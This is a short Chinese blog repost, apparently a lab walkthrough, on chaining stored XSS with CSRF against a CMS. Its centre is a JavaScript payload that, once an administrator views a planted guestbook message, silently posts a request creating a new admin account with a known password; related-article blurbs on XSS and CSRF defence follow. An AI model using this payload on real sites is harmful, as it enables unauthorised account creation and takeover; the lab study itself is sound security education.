XSS结合CSRF

7月前作者：blackK_YC 分类：Toy博客阅读(23) 违法举报

这篇具有很好参考价值的文章主要介绍了XSS结合CSRF。希望对大家有所帮助。如果存在错误或未考虑完全的地方，请大家不吝赐教，您也可以点击"举报违法"按钮提交疑问。

假设我们获得了目标CMS的源码，搭建了一个相同的网站，我们在自己的网站执行添加用户的操作，并且用bp抓包

XSS结合CSRF,xss,csrf,前端

如图，这是我们抓到的添加用户的数据包

XSS结合CSRF,xss,csrf,前端

接下来，我们可以根据数据包构造js代码

<script>
xmlhttp = new XMLHttpRequest();
xmlhttp.open("post","http://10.9.75.161/cms/admin/user.action.php",false);
xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xmlhttp.send("act=add&username=admin123456&password=123456&password2=123456&button=%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7&userid=0");
</script>

接下来我们将js代码放到存储型XSS的地方，当管理员浏览留言自动执行XSS

XSS结合CSRF,xss,csrf,前端

当管理员进入留言管理触发csrf

XSS结合CSRF,xss,csrf,前端

可以看到生成了目标账户

XSS结合CSRF,xss,csrf,前端

文章来源地址https://www.toymoban.com/news/detail-687826.html

到了这里，关于XSS结合CSRF的文章就介绍完了。如果您还想了解更多内容，请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章，希望大家以后多多支持TOY模板网！

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：如若内容造成侵权/违法违规/事实不符，请点击违法举报进行投诉反馈，一经查实，立即删除！

分享到：

领支付宝红包赞助服务器费用

前端安全：CSRF、XSS该怎么防御？

近几年随着业务的不断发展，前端随之面临很多安全挑战。我们在日常开发中也需要不断预防和修复安全漏洞。接下来，梳理一些场景的前端安全问题和对应的解决方案。 XSS是后端的责任，后端应该在用户提交数据的接口对隐私敏感的数据进行转义。 NO，这种说法不对所有

2024年02月02日
浏览(33)
面试：前端安全之XSS及CSRF

XSS攻击全称跨站脚本攻击(Cross Site Scripting); CSRF（Cross-site request forgery）跨站请求伪造，也被称为“One Click Attack”或者Session Riding，通常缩写为CSRF或者XSRF;是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。跟跨网站脚本（XSS）相比，XSS 利用的是用户

2024年02月16日
浏览(38)
常见的前端安全CSRF/XSS以及常规安全策略

1、CSRF：跨站请求伪造（Cross-site request forgery）；原理：（1）用户C打开浏览器，访问受信任网站A，输入用户名和密码请求登录网站A；（2）在用户信息通过验证后，网站A产生Cookie信息并返回给浏览器，此时用户登录网站A成功，可以正常发送请求到网站A；（3）用户未退出

2024年02月04日
浏览(31)
前端面试：【XSS、CSRF、CSP】Web安全的三大挑战

嗨，亲爱的Web开发者！在构建现代Web应用时，确保应用的安全性至关重要。本文将深入探讨三个常见的Web安全威胁：XSS（跨站脚本攻击）、CSRF（跨站请求伪造攻击）和CSP（内容安全策略），以帮助你了解并应对这些威胁。 1. XSS（跨站脚本攻击）： XSS是一种攻击方式，攻击者

2024年02月11日
浏览(31)
xss csrf 攻击

介绍 xss csrf 攻击 XSS： XSS 是指跨站脚本攻击。攻击者利用站点的漏洞，在表单提交时，在表单内容中加入一些恶意脚本，当其他正常用户浏览页面，而页面中刚好出现攻击者的恶意脚本时，脚本被执行，从而使得页面遭到破坏，或者用户信息被窃取。要防范 XSS 攻击，需要在

2024年02月14日
浏览(33)
XSS和CSRF

如果登陆了一个网站，不小心又打开另一个恶意网站，如果没有安全策略，则他可以对已登录的网站进行任意的dom操作、伪造接口请求等，因此安全策略是必要的；浏览器的同源策略限制了非同源的域名之间不可以对DOM进行读写操作、不可以读取非同源的cookie、indexDB、

2024年02月13日
浏览(26)
xss和csrf攻击

xss是指向html或dom中注入恶意脚本，从而在用户浏览页面的时候利用脚本对用户实施攻击的手段 xss可以实现： cookie信息的窃取监听用户行为（如表单输入提交）修改dom（伪造登录页面窃取账号密码）生成浮窗广告防止xss攻击的策略：服务器对输入脚本进行过滤或转码设置

2023年04月11日
浏览(29)
CSRF 和 XSS 是什么

在Web开发中，安全性是至关重要的。然而，随着网络攻击技术的不断演进，跨站请求伪造（CSRF）和跨站脚本攻击（XSS）成为了最常见和具有破坏力的网络安全威胁之一。本文将介绍CSRF和XSS的概念、原理以及防御措施。 CSRF攻击是指利用用户已经通过身份验证的浏览器向目标网

2024年02月06日
浏览(21)
CSRF 攻击和 XSS 攻击分别代表什么？如何防范？

一：PHP 1. CSRF 攻击和 XSS 攻击分别代表什么？ 1.CSRF攻击 1.概念： CSRF（Cross-site request forgery）跨站请求伪造，用户通过跨站请求，以合法身份做非法的事情 2.原理：

2024年02月13日
浏览(34)
常见web安全漏洞-暴力破解，xss，SQL注入，csrf

1，暴力破解原理：使用大量的认证信息在认证接口进行登录认证，知道正确为止。为提高效率一般使用带有字典的工具自动化操作基于表单的暴力破解 --- 若用户没有安全认证，直接进行抓包破解。验证码绕过 on s

2023年04月12日
浏览(42)